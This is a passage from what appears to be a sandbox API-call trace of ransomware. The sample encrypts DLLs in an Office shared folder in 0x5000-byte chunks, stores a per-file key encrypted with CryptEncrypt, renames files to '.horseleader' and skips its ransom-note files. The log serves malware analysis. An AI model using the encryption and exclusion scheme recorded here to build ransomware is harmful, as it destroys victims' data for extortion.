pbBuffer=0x32aed10) returned 1 [0241.310] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0241.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0241.311] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL") returned 72 [0241.311] StrStrW (lpFirst="ACEOLEDB.DLL", lpSrch=".txt") returned 0x0 [0241.311] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=537504) returned 1 [0241.311] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.311] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.481] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.481] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.482] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3f1d0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.482] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.542] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.542] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.543] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x7e3a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.543] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.644] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.644] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.644] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.644] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0241.644] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0241.645] CloseHandle (hObject=0x158) returned 1 [0241.645] GetProcessHeap () returned 0x780000 [0241.645] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0241.645] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.horseleader") returned 84 [0241.645] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEOLEDB.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceoledb.dll.horseleader")) returned 1 [0241.646] GetProcessHeap () returned 0x780000 [0241.646] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0241.646] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96faef00, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd8247e00, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x96faef00, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0x6e398, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACER3X.DLL", cAlternateFileName="")) returned 1 [0241.647] lstrcmpiW (lpString1="ACER3X.DLL", lpString2="Windows") returned -1 [0241.647] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 70 [0241.647] StrStrIW (lpFirst="ACER3X.DLL", lpSrch=".horseleader") returned 0x0 [0241.647] lstrcmpW (lpString1="ACER3X.DLL", lpString2="#Decrypt#.txt") returned 1 [0241.647] lstrcmpW (lpString1="ACER3X.DLL", lpString2="_uninstalling_.png") returned 1 [0241.647] lstrlenW (lpString=".testttjffg") returned 11 [0241.647] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL", lpSrch=".testttjffg") returned 0x0 [0241.647] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0241.647] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0241.647] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0241.648] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 70 [0241.648] StrStrW (lpFirst="ACER3X.DLL", lpSrch=".txt") returned 0x0 [0241.648] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=451480) returned 1 [0241.648] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.648] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.734] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.734] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.735] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x349cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.735] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.994] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0241.994] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0241.994] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x69398, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.994] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.018] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0242.018] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.018] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.018] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0242.018] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0242.018] CloseHandle (hObject=0x158) returned 1 [0242.019] GetProcessHeap () returned 0x780000 [0242.019] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0242.019] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.horseleader") returned 82 [0242.019] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acer3x.dll.horseleader")) returned 1 [0242.021] GetProcessHeap () returned 0x780000 [0242.021] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0242.021] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95c9c200, ftCreationTime.dwHighDateTime=0x1cba070, ftLastAccessTime.dwLowDateTime=0xd826df60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x95c9c200, ftLastWriteTime.dwHighDateTime=0x1cba070, nFileSizeHigh=0x0, nFileSizeLow=0xd9c0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACERCLR.DLL", cAlternateFileName="")) returned 1 [0242.021] lstrcmpiW (lpString1="ACERCLR.DLL", lpString2="Windows") returned -1 [0242.021] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 71 [0242.021] StrStrIW (lpFirst="ACERCLR.DLL", lpSrch=".horseleader") returned 0x0 [0242.021] lstrcmpW (lpString1="ACERCLR.DLL", lpString2="#Decrypt#.txt") returned 1 [0242.021] lstrcmpW (lpString1="ACERCLR.DLL", lpString2="_uninstalling_.png") returned 1 [0242.021] lstrlenW (lpString=".testttjffg") returned 11 [0242.021] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL", lpSrch=".testttjffg") returned 0x0 [0242.021] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0242.021] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0242.022] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0242.023] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL") returned 71 [0242.023] StrStrW (lpFirst="ACERCLR.DLL", lpSrch=".txt") returned 0x0 [0242.023] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=55744) returned 1 [0242.023] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0242.027] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.028] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.123] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0242.123] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.123] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x39c0, lpOverlapped=0x0) returned 1 [0242.124] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffc640, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0242.124] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x39c0, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x39c0, lpOverlapped=0x0) returned 1 [0242.124] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.124] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0242.124] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0242.125] CloseHandle (hObject=0x158) returned 1 [0242.125] GetProcessHeap () returned 0x780000 [0242.125] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0242.125] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.horseleader") returned 83 [0242.125] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACERCLR.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerclr.dll.horseleader")) returned 1 [0242.126] GetProcessHeap () returned 0x780000 [0242.126] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0242.126] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd826df60, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0xa8da0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACEREP.DLL", cAlternateFileName="")) returned 1 [0242.126] lstrcmpiW (lpString1="ACEREP.DLL", lpString2="Windows") returned -1 [0242.126] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 70 [0242.126] StrStrIW (lpFirst="ACEREP.DLL", lpSrch=".horseleader") returned 0x0 [0242.126] lstrcmpW (lpString1="ACEREP.DLL", lpString2="#Decrypt#.txt") returned 1 [0242.126] lstrcmpW (lpString1="ACEREP.DLL", lpString2="_uninstalling_.png") returned 1 [0242.127] lstrlenW (lpString=".testttjffg") returned 11 [0242.127] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL", lpSrch=".testttjffg") returned 0x0 [0242.127] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0242.127] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0242.127] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0242.127] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL") returned 70 [0242.127] StrStrW (lpFirst="ACEREP.DLL", lpSrch=".txt") returned 0x0 [0242.127] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=691616) returned 1 [0242.127] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.128] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0242.143] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0242.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x51ed0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.143] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.851] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.851] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.851] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xa3da0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.851] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.854] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.854] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.854] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.859] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.859] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.859] CloseHandle (hObject=0x158) returned 1 [0243.859] GetProcessHeap () returned 0x780000 [0243.859] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.860] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.horseleader") returned 82 [0243.860] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEREP.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acerep.dll.horseleader")) returned 1 [0243.861] GetProcessHeap () returned 0x780000 [0243.861] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.861] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d59d00, ftCreationTime.dwHighDateTime=0x1cba5d5, ftLastAccessTime.dwLowDateTime=0xd82940c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x35d59d00, ftLastWriteTime.dwHighDateTime=0x1cba5d5, nFileSizeHigh=0x0, nFileSizeLow=0x48990, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ACETXT.DLL", cAlternateFileName="")) returned 1 [0243.861] lstrcmpiW (lpString1="ACETXT.DLL", lpString2="Windows") returned -1 [0243.861] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 70 [0243.861] StrStrIW (lpFirst="ACETXT.DLL", lpSrch=".horseleader") returned 0x0 [0243.861] lstrcmpW (lpString1="ACETXT.DLL", lpString2="#Decrypt#.txt") returned 1 [0243.861] lstrcmpW (lpString1="ACETXT.DLL", lpString2="_uninstalling_.png") returned 1 [0243.861] lstrlenW (lpString=".testttjffg") returned 11 [0243.861] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL", lpSrch=".testttjffg") returned 0x0 [0243.861] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.861] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.861] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft 